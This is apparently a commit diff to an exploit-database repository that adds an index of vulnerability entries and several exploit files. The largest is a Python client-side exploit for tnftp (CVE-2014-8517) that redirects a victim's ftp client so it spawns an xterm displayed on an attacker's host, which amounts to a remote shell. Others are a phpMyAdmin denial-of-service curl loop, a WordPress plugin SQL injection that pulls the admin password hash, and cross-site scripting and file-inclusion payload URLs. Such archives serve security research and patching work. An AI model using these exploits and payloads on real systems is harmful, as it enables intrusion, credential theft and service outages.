pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 21 additions & 1 deletion b/‎files.csv‎
Lines changed: 21 additions & 1 deletion
diff --git a/‎platforms/bsd/remote/35427.py‎
Lines changed: 148 additions & 0 deletions b/‎platforms/bsd/remote/35427.py‎
Lines changed: 148 additions & 0 deletions
diff --git a/‎platforms/php/dos/35539.txt‎
Lines changed: 42 additions & 0 deletions b/‎platforms/php/dos/35539.txt‎
Lines changed: 42 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35505.txt‎
Lines changed: 35 additions & 0 deletions b/‎platforms/php/webapps/35505.txt‎
Lines changed: 35 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35520.txt‎
Lines changed: 9 additions & 0 deletions b/‎platforms/php/webapps/35520.txt‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35521.txt‎
Lines changed: 19 additions & 0 deletions b/‎platforms/php/webapps/35521.txt‎
Lines changed: 19 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35522.txt‎
Lines changed: 10 additions & 0 deletions b/‎platforms/php/webapps/35522.txt‎
Lines changed: 10 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35523.txt‎
Lines changed: 9 additions & 0 deletions b/‎platforms/php/webapps/35523.txt‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35524.txt‎
Lines changed: 7 additions & 0 deletions b/‎platforms/php/webapps/35524.txt‎
Lines changed: 7 additions & 0 deletions
diff --git a/‎platforms/php/webapps/35525.txt‎
Lines changed: 11 additions & 0 deletions b/‎platforms/php/webapps/35525.txt‎
Lines changed: 11 additions & 0 deletions
@@ -31292,7 +31292,7 @@ id,file,description,date,author,platform,type,port
 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
 34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebasti�n Magof",hardware,webapps,80
-34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro S�nchez",windows,dos,0
+34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro S�nchez",windows,dos,0
 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
 34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
@@ -31912,6 +31912,7 @@ id,file,description,date,author,platform,type,port
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
 35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
+35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@@ -31980,6 +31981,7 @@ id,file,description,date,author,platform,type,port
 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator  7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
+35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0
 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
 35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
@@ -31992,3 +31994,21 @@ id,file,description,date,author,platform,type,port
 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
 35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
+35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0
+35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
+35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0
+35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0
+35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0
+35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0
+35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
+35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
+35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
+35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
+35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
+35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
+35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
+35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
+35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
+35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
+35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
+35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
@@ -0,0 +1,148 @@
+#!/usr/bin/env python2
+#
+# Exploit Title: [tnftp BSD exploit]
+# Date: [11/29/2014]
+# Exploit Author: [dash]
+# Vendor Homepage: [www.freebsd.org]
+# Version: [FreeBSD 8/9/10]
+# Tested on: [FreeBSD 9.3]
+# CVE : [CVE-2014-8517]
+
+# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
+# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
+#
+# 29 Nov 2014 by dash@hack4.org
+#
+# usage: 
+# 
+# redirect the vulnerable ftp client requests for http to your machine
+#
+# client will do something like: 
+# ftp http://ftp.freebsd.org/data.txt
+#
+# you will intercept the dns request and redirect victim to your fake webserver ip
+#
+# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1 
+# probably do also xhost+victimip
+#
+# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
+# 
+# sadly you cannot put a slash behind the | also www-encoded is not working
+# plus problems with extra pipes
+# this renders a lot of usefull commands useless
+# so xterm -display it was ;)
+#
+# *dirty* *dirdy* *dyrdy* *shell* !
+#
+
+import os
+import sys
+import time
+import socket
+
+
+def usage():
+	print "CVE-2014-8517 tnftp exploit"
+	print "by dash@hack4.org in 29 Nov 2014"
+	print
+	print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
+	print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
+
+#bind a fake webserver on 0.0.0.0 port 80
+def webserveRedirect(redirect):
+
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+	s.bind(("0.0.0.0",80))
+	s.listen(3)
+	h, c = s.accept()
+
+	#wait for request
+	#print h.recv(1024)
+
+	#send 302 
+	print "[+] Sending redirect :>"
+	h.send(redirect)
+	s.close()
+	return 0
+
+#bind a fake webserver on port %rport
+def deliverUgga(owned):
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+	s.bind(("0.0.0.0",rport))
+	s.listen(3)
+	h, c = s.accept()
+
+#	print h.recv(1024)
+	print "[+] Deliver some content (shell is spwaned now)"
+	h.send(owned)
+	s.close()
+
+	return 0
+
+owned="""HTTP/1.1 200 Found
+Date: Fri, 29 Nov 2014 1:00:03 GMT
+Server: Apache
+Vary: Accept-Encoding
+Content-Length: 5
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+
+
+ugga ugga
+"""
+
+if(os.getuid())!=0:
+	print "[-] Sorry, you need root to bind port 80!"
+	sys.exit(1)
+
+if len(sys.argv)<3:
+	usage()
+	sys.exit(1)
+
+rip = sys.argv[1]
+rport = int(sys.argv[2])
+revip = sys.argv[3]
+
+print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
+print "[+] Dont forget to run Xnest -ac :1"
+
+# ok, lets use xterm -display
+cmd = "xterm -display %s:1" % (revip)
+cmd = cmd.replace(" ","%20")
+
+print "[+] Payload: [%s]" % cmd
+
+redirect = 	"HTTP/1.1 302\r\n"\
+		"Content-Type: text/html\r\n"\
+		"Connection: keep-alive\r\n"\
+		"Location: http://%s:%d/cgi-bin/|%s\r\n"\
+ 		"\r\n\r\n" % (rip,rport,cmd)
+
+#child process owned data delivery
+uggapid = os.fork()
+if uggapid == 0:
+	uggapid = os.getpid()
+	deliverUgga(owned)
+else:
+#child proces for webserver redirect
+	webpid = os.fork()
+	if webpid == 0:
+		webpid = os.getpid()
+		webserveRedirect(redirect)
+
+
+
+#childs, come home!
+try:
+	os.waitpid(webpid,0)
+except:
+	pass
+try:
+	os.waitpid(uggapid,0)
+except:
+	pass
+
+#oh wait :>
+time.sleep(5)
@@ -0,0 +1,42 @@
+=============
+DESCRIPTION:
+=============
+A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
+before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers  to
+cause a denial of service (resource consumption) via a long password.
+CVE-2014-9218 was assigned
+
+=============
+Time Line:
+=============
+December 3, 2014 - A phpMyAdmin update and the security advisory is
+published.
+
+=============
+Proof of Concept:
+=============
+
+*1 - Create the payload.*
+
+$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
+{1..1000000} >> payload
+
+*2 - Performing the Denial of Service attack.*
+
+$ for i in `seq 1 150`; do (curl --data @payload
+http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
+
+=============
+Authors:
+=============
+
+-- Javer Nieto -- http://www.behindthefirewalls.com
+-- Andres Rojas -- http://www.devconsole.info
+=============
+
+References:
+====================================================================
+
+*
+http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
+* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php
@@ -0,0 +1,35 @@
+# Exploit Title: WP Symposium 14.10 SQL Injection
+# Date: 22-10-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
+# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
+# Category: webapps
+# CVE: CVE-2014-8810
+  
+1. Description
+  
+$_POST['tray'] is not escaped.
+
+File: wp-symposium\ajax\mail_functions.php
+$tray = $_POST['tray'];
+$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
+
+http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
+  
+2. Proof of Concept
+
+Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
+
+<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
+    <input type="hidden" name="action" value="getMailMessage">
+    Message ID: <input type="text" name="mid"><br />
+    SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
+    <input type="submit" value="Inject">
+</form>
+
+Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
+  
+3. Solution:
+  
+Update to version 14.11
+http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
+https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47073/info
+
+Claroline is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Claroline 1.10 is vulnerable; other versions may also be affected. 
+
+"><script>alert(0)</script> 
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/47074/info
+
+osCSS is prone to a cross-site scripting vulnerability and multiple local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
+
+osCSS 2.1.0 RC12 is vulnerable; other versions may also be affected. 
+
+
+Cross-site scripting:
+
+http://www.example.com/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//
+
+
+Local file include:
+
+http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
+
+http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47077/info
+
+Spitfire is prone to a cross-site scripting vulnerability. because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+[code]
+GET / HTTP/1.1
+Cookie: cms_username=admin">[xss]<
+[/code] 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47078/info
+
+Tracks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Tracks 1.7.2 is vulnerable; other versions may also be affected.
+
+http://example.com/todos/tag/&#039;"--></style></script><script>alert(0x000238)</script>
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47085/info
+
+XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script> 
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47086/info
+
+GuppY is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+GuppY 4.6.14 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/links.php?lng=fr [sql Injection]
+http://www.example.com/guestbk.php?lng=fr [sql Injection]
+http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection]